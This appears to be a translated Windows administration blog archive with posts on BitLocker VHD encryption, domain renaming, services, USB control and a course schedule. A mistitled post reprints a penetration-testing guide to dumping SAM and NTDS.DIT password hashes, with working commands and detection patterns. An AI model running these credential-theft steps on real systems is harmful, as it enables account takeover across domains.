Category Archives: Windows 7

Password-protecting specific folders with Windows BitLocker


This requirement can be met with the BitLocker service built into Windows (only Windows 7 Ultimate and Enterprise and later support this feature…).

The difficulty: BitLocker is software that runs on Windows and lets users encrypt physical or logical drives; it cannot handle individual folders. Our approach is therefore to put the folders that need encrypting onto one or more common drives and use BitLocker to encrypt those drives in full. The steps are as follows:

Step 1. Open the Windows disk management tool: click Start → Run → type the command: diskmgmt.msc

Step 2. You will see the available options in the DISK MANAGEMENT window.

Step 3. Choose Create VHD:

Then configure the storage settings for the virtual disk and click OK when done.

Step 4. To make the virtual disk appear in Windows 7 like the other drives, right-click the Disk and choose Initialize Disk.

The settings dialog opens:

Step 5. Next, create a partition on the VHD file: right-click Unallocated and choose New Simple Volume…

Just keep the default options (File system: NTFS, Allocation unit size: Default, Perform a quick format).

Step 6. Once the virtual disk has been created, copy the folders to be protected into it, and use BitLocker to encrypt it with a password, as in the USB case described earlier. The result is a virtual disk holding the folders.

Step 7. The virtual disk has to be added to the system with "Attach VHD": choose the menu Action → Attach VHD.

Then select the correct folder and file name of the saved VHD and click OK.

Step 8. Installation and setup are complete; a password is now required to access the folder or virtual disk that contains our important folders and files.
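The same procedure can be scripted with diskpart and manage-bde. This is an added example, not part of the original post; the VHD path, size, volume label and drive letter are assumed placeholders, and the script assumes Windows reassigns the same drive letter when the VHD is attached again.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell prompt.
# Assumed placeholders: VHD path, size, volume label and drive letter.
$VhdPath     = 'C:\Vault\secure.vhd'
$SizeMB      = 1024    # the USB post on this page advises at least 64 MB and at most 64 GB
$DriveLetter = 'V'
$Volume      = "${DriveLetter}:"

function Invoke-Diskpart {
    # diskpart takes non-interactive commands from a script file (/s):
    # write the file, run it, then delete it.
    param([string[]]$Commands)
    $script = Join-Path $env:TEMP ("diskpart_{0}.txt" -f [guid]::NewGuid().ToString('N'))
    Set-Content -Path $script -Value $Commands -Encoding ASCII
    try {
        & diskpart.exe /s $script | Out-Host
        if ($LASTEXITCODE -ne 0) { throw "diskpart failed with exit code $LASTEXITCODE" }
    }
    finally {
        Remove-Item -Path $script -ErrorAction SilentlyContinue
    }
}

function New-ProtectedVhd {
    if ($SizeMB -lt 64) { throw 'Volume is below the 64 MB minimum noted on this page.' }
    if ($SizeMB -gt 64 * 1024) { Write-Warning 'Volumes above 64 GB take a long time to process.' }
    if (Test-Path $VhdPath) { throw "$VhdPath already exists; use Mount-ProtectedVhd instead." }

    $dir = Split-Path -Parent $VhdPath
    if (-not (Test-Path $dir)) { New-Item -ItemType Directory -Path $dir | Out-Null }

    # Steps 3-5: create the VHD, attach it, create one NTFS volume with a quick format.
    Invoke-Diskpart @(
        "create vdisk file=`"$VhdPath`" maximum=$SizeMB type=fixed",
        "select vdisk file=`"$VhdPath`"",
        "attach vdisk",
        "create partition primary",
        "format fs=ntfs label=`"Vault`" quick",
        "assign letter=$DriveLetter"
    )

    # Step 6: add a password protector (manage-bde prompts for the password) and a
    # numerical recovery password. Store the recovery password off this volume.
    & manage-bde.exe -on $Volume -Password -RecoveryPassword
    if ($LASTEXITCODE -ne 0) { throw "manage-bde -on failed with exit code $LASTEXITCODE" }

    # Show protectors and encryption progress for the new volume.
    & manage-bde.exe -status $Volume
}

function Mount-ProtectedVhd {
    # Steps 7-8: attach the existing VHD, then unlock it with the password.
    Invoke-Diskpart @(
        "select vdisk file=`"$VhdPath`"",
        "attach vdisk"
    )
    & manage-bde.exe -unlock $Volume -Password
}

function Dismount-ProtectedVhd {
    # The data is only protected while the volume is locked or the VHD is detached.
    & manage-bde.exe -lock $Volume -ForceDismount
    Invoke-Diskpart @(
        "select vdisk file=`"$VhdPath`"",
        "detach vdisk"
    )
}

# Typical use:
#   New-ProtectedVhd          # once, to create and encrypt the virtual disk
#   Mount-ProtectedVhd        # each time the folders are needed
#   Dismount-ProtectedVhd     # when finished
```

Copying folders into the VHD leaves the originals unencrypted in their old location until they are removed.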


How can an enterprise organization change its domain name on Windows Server 2012?


The problem:

An enterprise's domain system is usually built on an internal structure that is unrelated to services on the Internet. But for some very basic reasons, the enterprise is large and spread across many different countries.

When a single domain structure and name is shared,

For example: Robusta.org, the member units and organizations reuse exactly this domain for the internal system in their own country. This is the traditional, simple, time-saving approach.

[Diagram: Robusta_Org_old]

After new infrastructure is built at the branches or member enterprises in the member countries, such as VMware vCenter virtualization, Private Cloud…

The branches and member enterprises run into new problems:

  1. They cannot copy the headquarters' domain name exactly, because of domain name conflicts and domain management issues when the branches need to publish services such as Web Portal, Intranet, Private Cloud and Mobile Applications that require digital certificates purchased from vendors such as Cert Sign, Godaddy…
  2. The domain name is managed by headquarters, so SSL/TLS registration has to be handled by the headquarters' IT admins, which is very time-consuming, or cannot be controlled proactively from the branch or member organization.
  3. When branches and member organizations invest in infrastructure, they usually have their own staffing structure and manage resources proactively and independently, and may even have an IT architecture that differs from the structure above:

[Diagram: Robusta_Org_new]

With the model above we will:

– Easily manage each domain name for the branches or member enterprises without depending on approval from, and waiting for action by, headquarters every time something comes up at a branch.

– Proactively manage domain names, servers, workstations, user accounts, groups and, in particular, the SSL/TLS services registered to publish intranet/extranet/internet.

Options for the change:

1. Option 1: Remove the domain at the branches or member enterprises (demote the AD-DC, then restart and dcpromo the AD-DC again with the new name)

  • This option simply repeats steps already done and costs the time to redo them, but it may not suit service servers that are already installed and in operation, such as UC Voice Lync Conferencing, Exchange Server 2013 on-premise, MS SQL Server Enterprise, MS SharePoint farm, MS BizTalk Server Enterprise…
  • All of the servers above are installed and configured on top of Windows Authentication and need to be joined to the original domain name. Removing the current domain means losing Windows Authentication and the WCF Platform that allow the service servers to run.
  • This option can cause failures that leave systems unusable, because the services and configuration of complex applications that were set up under the old domain name are incompatible with the new configuration.

2. Option 2: Change the domain name (rename the domain, then rejoin the servers and workstations to the domain)

– This option simply involves more than 28 steps to rename the domain and rejoin the machines in the branch's domain.

– This option costs the time needed to rejoin the service servers and workstations with the new domain name and the new domain-join admin account.

– This option does not require reconfiguring all existing application services; only the parameters in the following cases need attention:

1. UC Server: the service login accounts in the UPN@domain form have to be re-checked, and then the services have to be checked for use of domain\username accounts.

For the CTL certificates, some root certificates will have to be removed or the certificates renewed.

2. MS SQL Server Enterprise: server login access rights, and possibly DB Admin rights, have to be configured in Mixed mode (allowing the local SQL account "sa") so that MS SQL can be accessed when there is a problem with the Domain Controller or when the domain name change results in accounts from the old domain name controlling MS SQL Server…

3. MS Exchange Server: the Exchange Configuration Wizard has to be run again to rebuild the configuration for the new domain and reconfigure the mail server.

4. MS SharePoint Server: the SharePoint Server Configuration Wizard has to be run again to rebuild the server farm and some other configuration.

5. The GPOs of the AD-DC must be backed up before the domain is renamed.

3. Option 3: Do not change the domain name; only add aliases for the domain on the DNS server (add DNS zones and A (Host), CNAME, PTR, TXT and SRV records)

– This option simply involves more than 3 steps to change the service server name parameters and map the internal IPs of the branch's machines.

– This option costs a little time to check workstations and service servers, both from outside and from the internal network, to determine whether each item runs stably.

– This option may not suit the branch's entire application infrastructure when there are several different OS standards, several different user data connection standards, or applications with hard-coded LDAP/ADFS calls…

– This option only suits infrastructure that has deployed or is deploying Private Cloud, letting intranet web portals, Windows Forms applications… be reached over the Internet from HTML5 web browsers on smartphones and mobile devices without setting up a site-to-site VPN.

In summary, option 2 is the most reasonable.

For the detailed steps, see:

Steps to rename the domain: https://mizitechinfo.wordpress.com/2013/06/10/simple-guide-how-to-rename-domain-name-in-windows-server-2012/

Technical notes on renaming a domain: http://technet.microsoft.com/en-us/library/cc738208(v=ws.10).aspx

Support article on re-registering new certificates for UC: http://support.microsoft.com/kb/2464556/

How to register certificates for IIS8, IIS8.5: https://www.digicert.com/ssl-support/ssl-host-headers-iis-8.htm

How to register certificates for Exchange 2013: http://exchangeserverpro.com/exchange-server-2013-ssl-certificates/

Course start schedule at the ROBUSTA Institute of IT Training and Management, Hanoi


If you need a course outside the schedule above, please contact Robusta.

VMware technology courses

| No. | Course | Start date | Hours | Days | Duration | Fee | Instructor |
| 1 | Deploying and administering virtualization infrastructure with VMware vSphere 5.5 | 05-05-2014 | 18h-21h | Mon-Fri | 40 hours | Contact us | Vietnam |
| 2 | | 10-05-2014 | 09h-17h | Sat, Sun | 40 hours | Contact us | Vietnam |
| 3 | | 12-05-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 4 | VMware vSphere: Optimize & Scale [v5.1] | 26-05-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 5 | VMware desktop and application virtualization [v5.5] | 19-05-2014 | 18h-21h | Weekdays | 40 hours | Contact us | Vietnam |
| 6 | | 09-06-2014 | 18h-21h | Mon, Wed, Fri | 40 hours | Contact us | Vietnam |
| 7 | VMware vCenter Configuration Manager for Virtual Infrastructure Management [V5.x] | 04-06-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Foreign |
| 8 | VMware vCenter Operations Manager: Analyze and Predict [V5.x] | 02-06-2014 | 09h-17h | Weekdays | 16 hours | Contact us | Foreign |
| 9 | VMware vCenter Configuration Manager for Virtual Infrastructure Management [V5.x] | 04-06-2014 | 09h-17h | Weekdays | 24 hours | Contact us | Foreign |

Microsoft courses

| No. | Course | Start date | Hours | Days | Duration | Fee | Instructor |
| 1 | Office365 comprehensive | 05-05-2014 | 09h-17h | Weekdays | 24 hours | 06 million | Vietnam |
| 2 | | 05-05-2014 | 18h-21h | Mon, Wed, Fri | 24 hours | 06 million | Vietnam |
| 3 | Manage Projects with Microsoft Project 2010 | 12-05-2014 | 18h-21h | Mon, Wed, Fri | 24 hours | 05 million | Vietnam |
| 4 | BizTalk Server development for programmers | 12-05-2014 | 09-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 5 | BizTalk Server administration | 26-05-2014 | 09-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 6 | BizTalk development for enterprise application integration | 02-06-2014 | 09-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 7 | | 02-06-2014 | 18h-21h | Tue, Thu, Sat | 40 hours | Contact us | Vietnam |
| 8 | Designing and developing Microsoft SharePoint applications | 19-05-2014 | 18h-21h | Mon, Wed, Fri | 40 hours | Contact us | Vietnam |
| 9 | Designing Microsoft SharePoint infrastructure architecture | 26-05-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 10 | Advanced course: tuning SharePoint 2010 for high performance | 23-06-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 11 | Designing BI solutions with Microsoft SQL Server | 09-06-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |

Other courses

| No. | Course | Start date | Hours | Days | Duration | Fee | Instructor |
| 1 | IT management and information security | 19-05-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 2 | | 19-05-2014 | 18h-21h | Mon, Wed, Fri | 40 hours | Contact us | Vietnam |
| 3 | IT Management Skills | 16-06-2014 | 09h-17h | Weekdays | 40 hours | Contact us | Vietnam |
| 4 | ITIL – Information Technology Infrastructure Library Foundation V3 | 16-06-2014 | 18h-21h | Mon, Wed, Fri | 24 hours | Contact us | Vietnam |
| 5 | Designing PHP and HTML5 websites using an industrial production method | 27-4-2014 | 08h-12h | Sunday | 4 hours | 01 million | Vietnam |

Special offers:

– Special discount for students who register and pay at least 02 weeks before the start date, or who register as a group of 02 or more.

For details please contact:

Lê Trường Sơn (Mr.) – Mobile : (+84) 0904 411 933 – Email: son.le@robusta.vn

Lê Toàn Thắng (Mr.) – Mobile : (+84) 943 851 178 – Email: thang.le@robusta.vn

Thank you; we look forward to cooperating with and supporting you and your organization in the near future!

How to run applications as a Windows service


Windows NT, Windows 2000 Server, Windows Server 2003, 2008 and 2012 all provide the Windows Resource Kit, a set of tools for handling system services.

The need facing a programmer or administrator is:

"How can these programs be run on a Windows server as hosted services, so that when Windows Server starts up the applications are also started / stopped automatically along with the Windows Server processes?"

Step 1.

Locate the Windows Resource Kit command set in c:\windows\SysWOW64; you will find the file sc.exe (used to register services that run on 64-bit Windows).

Step 2. Type the command in a CMD window opened with "Run as administrator", using the following syntax:

sc.exe create "Service name" start= auto binpath= "folder path and file name of the service executable"

Example: c:\windows\syswow64\sc.exe create "RobustaCRM Testing System" start= auto binpath= "c:\CRM\RobustaCRM_ Test\mainservice.exe"

Step 3. After running the SC command above, check the result in Administrative Tools > Services.

Step 4. Create the entry in Windows Registry Editor.

Open Run and type the command: regedit

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RobustaCRM Testing\Parameters]

"Application"="c:\\CRM\\RobustaCRM_Test\\mainservice.exe"

Good luck!

Allowing only designated USB access on Windows 7/8.x computers


1. Option 1:

Instead of restricting which designated USB drives may use the PC's USB ports, we can restrict access so that only authorized users can use the USB ports. The steps are as follows:

Step 1: Start Windows Explorer and browse to: "%SystemRoot%\Inf"

Step 2: Locate the file Usbstor.PNF, right-click it and choose Properties:

Step 3: The properties dialog opens; choose the Security tab.

Note: accounts from the AD Domain/LDAP system can also be added to the Deny permission list.

Step 4: Do the same for the file Usbstor.INF:

Step 5. Check: after resetting the permissions for users and groups on the two files above, only the designated users and groups can access the USB ports.

2. Option 2: use BitLocker

Step 1. Plug the USB drive into the computer's USB port, right-click the USB drive to be encrypted and choose Turn on BitLocker.

Step 2. The BitLocker encryption dialog opens, offering 2 ways to unlock the drive once it is encrypted: 1. use a password, 2. use a TPM card.

To meet the requirement we choose the password method and enter the password below (the password used to open the folders after encryption…).

Step 3. After setting the password you are given a "hard" key file for recovery in case the password is lost or forgotten…

Step 4. Next, click Next to start encrypting the drive.

When the process finishes, a completion dialog opens:

Note: the volume to be encrypted and password-protected must be at least 64 MB and should not exceed 64 GB, because decryption will take a long time when access is needed.

Step 5. When finished, the USB drive is password-protected:

Opening it requires the password. Note that you will be asked for the password every time the USB drive is plugged in.

How to hide your computer on the LAN


My computer is named ThinApp. To hide it from the Network icon, follow these steps:

Step 1: Click Start, choose Run and search for "service".

Step 2: Select the service "Function Discovery Resource Publication":

Step 3. Then set it to "Disabled" as follows:

Step 4. Check the result:

How to synchronize Active Directory Sync when usernames and passwords are encrypted according to the 32/64-bit OS? (continued)


Part 1: understanding how password hashes are stored on the OS

Windows Security Account Manager
Slightly modified definition from Wikipedia:

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 7. It stores users’ passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Generally, dumping operating system users’ password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticate with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc.

Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways.

Physical access

Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick. Two widely known tools to dump the local users’ hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:

  • bkhive – dumps the syskey bootkey from a Windows system hive.
  • samdump2 – dumps Windows 2k/NT/XP/Vista password hashes.

These tools are generally included in many GNU/Linux live distributions. If they’re not, make sure to bring a copy of them with you.

Usage:

# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
bkhive systemhive keyfile

# samdump2
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
samdump2 samhive keyfile

Example of retrieving the SAM hashes from a Windows partition /dev/sda1:

# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.

Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users’ password hashes, some smart people have come up with innovative approaches:

  • BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
  • SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the “create CD from ISO image” feature of your preferred CD burning software to create a bootable SysRq CD.
  • Kon-Boot is a prototype piece of software which allows changing the contents of a Linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows logging into a Linux system as the root user without typing the correct password, or elevating privileges from the current user to root. For Windows systems it allows entering any password-protected profile without any knowledge of the password.

Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user’s credentials.

Post-exploitation scenario

The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals’ PsExec utility:

C:\>psexec.exe -i -s cmd.exe

There are several other techniques too, but they are outside the scope of this post.

Legacy techniques

On Windows NT and Windows 2000 systems you can use Ntbackup utility part of the MS-DOS subsystem: Backup the system state into a file locally on the machine you have compromised, then using Ntbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup – typical for a Windows 2000 with current service packs and hot fixes.
On modern releases of Windows, you can use Wbadmin, an alternative to Ntbackup.

Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:

C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system

If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe. Using reg.exe:

C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully

Using regedit.exe:

  • Execute regedit.exe from Start / Run prompt.
  • Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
  • Change the Save as type setting to Registry Hive Files and save as SAM.
  • Same steps with SYSTEM hive.

Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. However, this directory contains outdated copies of the original C:\Windows\System32\config\ files, so it might not reflect the current users’ credentials.

Volume Shadow Copies technique

This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access locked system files like C:\Windows\System32\config’s SAM and SYSTEM and others.

You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows.

List shadow copies:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

As expected, no shadow copies initially.

Verify the status of the Volume Shadow Service (VSS):

C:\>cscript vssown.vbs /status
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Stopped

C:\>cscript vssown.vbs /mode
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] VSS service set to ‘Manual’ start mode.

In this case, once we are done, we need to restore it to the initial state (Stopped).

Create a new shadow copy:

C:\>cscript vssown.vbs /create
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to create a shadow copy.

Verify that the shadow copy has been created:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

[*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
[*] Client accessible: True
[*] Count: 1
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] Differnetial: True
[*] Exposed locally: False
[*] Exposed name:
[*] Exposed remotely: False
[*] Hardware assisted: False
[*] Imported: False
[*] No auto release: True
[*] Not surfaced: False
[*] No writers: True
[*] Originating machine: LAPTOP
[*] Persistent: True
[*] Plex: False
[*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5}
[*] Service machine: LAPTOP
[*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F}
[*] State: 12
[*] Transportable: False
[*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\

You need to take note of the Device object value for the next step and the ID for the cleanup step.

Pull the following files from a shadow copy:

C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .

You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder.

Cleanup:

C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Eventually, restore to original Stop status:

C:\>cscript vssown.vbs /stop

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Signal sent to stop the VSS service.
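
From the defender's side, the registry hive copy and Volume Shadow Copies commands shown above leave recognizable process command lines. The following is an added detection example, not part of the original article; the rule set, function name and log records are constructed for illustration and cover only the commands that appear on this page.

```powershell
# Added example, not from the original article. The sample records are constructed.
# Each rule matches one of the hive-copy commands shown earlier on this page.
# PowerShell's -match operator is case-insensitive, so no inline flag is needed.
$HiveCopyRules = @(
    @{ Name    = 'reg.exe save of the SAM/SYSTEM/SECURITY hive'
       # (\s|$) after the hive name avoids flagging a save of a SYSTEM subkey.
       Pattern = '\breg(\.exe)?\s+save\s+(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)(\s|$)' },
    @{ Name    = 'regback.exe copy of a credential hive'
       Pattern = '\bregback(\.exe)?\s+\S+\s+machine\s+(sam|system|security)\b' },
    @{ Name    = 'vssown.vbs shadow copy creation'
       Pattern = '\bvssown\.vbs\s+/create\b' },
    @{ Name    = 'credential file read from a shadow copy device'
       Pattern = '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\.*\\(config\\(SAM|SYSTEM|SECURITY)|ntds\.dit)\b' }
)

function Find-HiveCopyCommand {
    # Returns one result object per record whose CommandLine matches a rule.
    param([Parameter(Mandatory = $true)][object[]]$Records)
    foreach ($r in $Records) {
        foreach ($rule in $HiveCopyRules) {
            if ($r.CommandLine -match $rule.Pattern) {
                New-Object PSObject -Property @{
                    Time        = $r.Time
                    Computer    = $r.Computer
                    User        = $r.User
                    Rule        = $rule.Name
                    CommandLine = $r.CommandLine
                }
                break   # first matching rule is enough for this record
            }
        }
    }
}

# Constructed process-creation records (time|computer|user|command line).
$SampleText = @'
Time|Computer|User|CommandLine
2014-01-04T09:12:03|WS01|CORP\alice|reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
2014-01-04T09:15:41|WS01|CORP\alice|reg.exe save HKLM\SYSTEM\CurrentControlSet\Services\Tcpip C:\temp\tcpip.hiv
2014-01-04T22:40:10|SRV02|CORP\svc-backup|reg.exe save HKLM\SAM sam
2014-01-04T22:40:12|SRV02|CORP\svc-backup|reg.exe save HKLM\SYSTEM sys
2014-01-04T22:51:30|SRV02|CORP\svc-backup|cscript vssown.vbs /list
2014-01-04T22:51:55|SRV02|CORP\svc-backup|cscript vssown.vbs /create
2014-01-04T22:53:02|SRV02|CORP\svc-backup|cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
2014-01-04T23:05:17|SRV03|CORP\admin2|regback.exe C:\backtemp\SAM machine sam
'@
$SampleLog = ($SampleText -split "`r?`n") | ConvertFrom-Csv -Delimiter '|'

Find-HiveCopyCommand -Records $SampleLog |
    Select-Object Time, Computer, User, Rule, CommandLine |
    Format-Table -AutoSize -Wrap
```

In practice the records would come from process-creation events that include the command line, such as Security event 4688 with command-line auditing enabled or Sysmon event ID 1. Command-line matching misses renamed tools, so treat a hit as one signal alongside file-access auditing on the config directory.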

In-memory technique

The concept behind in-memory dump of SAM hashes is to inject a DLL into the LSASS system process or, generally speaking, to parse the memory for specific patterns and inspect the content of these memory pages. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process, therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. Both work on 32-bit and 64-bit systems across all versions of Windows. Although, the former cannot successfully dump users’ password hashes on domain controllers as it reads the SAM hashes from the registry rather than injecting into LSASS process. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The following screen-shot shows the dump of SAM users with gsecdump on a Windows Server 2003 SP2 32-bit:

Dump of local users with gsecdump by code injection into the LSASS process

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

 

Part 2: Summary of password hash storage

Conclusions on Windows Security Account Manager
In the previous post of this series, I briefly explained what the Windows Security Account Manager (SAM) is, how to dump Windows local users’ password hashes from SAM having physical access to the target system or following a remote compromise of the machine, post-exploitation.
Remotely, there exist three possible techniques: legacy, volume shadow copies and in-memory dump. Lastly, I highlighted the most widely used tools for the in-memory hashes dump and I collected and released them in this spread-sheet along with other tools that I will discuss later.
I want to reiterate the following concept: given file transfer ability between your machine and the target system, always prefer to copy the SAM and SECURITY files over from the target and extract the password hashes offline afterwards.
However, this safe approach to password hashes dump does not guarantee that you are going to obtain all Windows local accounts’ hashes. If you suspect that this is the case, you will have to dump the hashes via in-memory dump and merge the results. Odd, but I have seen this happening quite a few times already and I am still discussing standalone Windows workstations, not part of a Windows domain.
Preferred tools
Personally, my first choice for standalone SAM hashes dump is pwdump7: it works on all Windows version from 2000 on both 32-bit and 64-bit systems. However, this tool does not perform an in-memory dump and could miss out hashes. I always run gsecdump along with pwdump7 to cover both techniques across all Windows versions and architecture and carefully launched once at a time do crash the LSASS process.
When I have got a Metasploit Meterpreter shell onto the system, I rely on the post-exploitation module smart_hashdump by Carlos Perez, falling back to its predecessor post-exploitation module hashdump when it fails.
Active Directory
Definition from Wikipedia:

Active Directory serves as a central location for network administration and security. It is responsible for authenticating and authorizing all users and computers within a network of Windows domain type, assigning and enforcing security policies for all computers in a network […] when a user logs into a computer that is part of a Windows domain, it is Active Directory that verifies his or her password […]

This definition comes into play when you have compromised a system part of a Windows domain. In order to quickly extend your control over the whole domain, the goal is to compromise the root domain controller. If you are within a child domain, the final goal is to achieve Enterprise Domain Administrator level access onto the root domain controller of the Windows forest’s parent domain. There are plenty of resources on the Internet discussing domain escalation and this is out of the scope of this post series. A blog post that summarizes the best techniques and goes straight to the point is written by pentestmonkey.net. Alternatively, you can pass the local users’ hashes obtained from your entry point machines to keimpx and spray them against the domain controllers: if the system administrator reuses the same local Administrator password across all machines, you are in!
Regardless of how you have compromised a domain controller, preferably the root domain controller as it is the first to get updated with changes to user accounts, the important thing is that you have got an administrator (local or domain) shell onto it.
Database file NTDS.DIT
The goal now is to dump the domain users’ password hashes. These are stored, along with nearly all the information that is accessible in the Active Directory (user objects, groups, membership information, etc), in a binary file, %SystemRoot%\ntds\NTDS.DIT.
This file is locked by the system. You can use the volume shadow copies technique illustrated in the previous post to copy it along with the SYSTEM file over to your machine.
Alternatively, use the ntdsutil snapshot facility introduced in Windows Server 2008. It will create a snapshot of the active directory database allowing you to copy ntds.dit and SYSTEM file. This technique is detailed on a Microsoft TechNet article.
Extract hashes from NTDS.DIT
You can use the passcape’s Windows Password Recovery tool to extract hashes from ntds.dit.
Alternatively, you can use a couple of tools (ntds_dump_hash.zip) developed by Csaba Barta and documented in his paper titled Research paper about offline hash dump and forensic analysis of ntds.dit. These tools are used to:

  • Extract the required data from ntds.dit: esedbdumphash.
  • Decrypt the hashes and interpreting other information regarding the user account: dsdump.py, dsdumphistory.py, dsuserinfo.py.

Download and compile the tool:

$ wget http://csababarta.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make

Use esedbdumphash to extract the datatable from ntds.dit:

$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output <ntds.dit file>
$ ls -1 /tmp/output.export/
datatable

Use dsdump.py to dump the hashes from the datatable file using the bootkey (SYSKEY) from the SYSTEM hive:

$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py <SYSTEM file> /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt

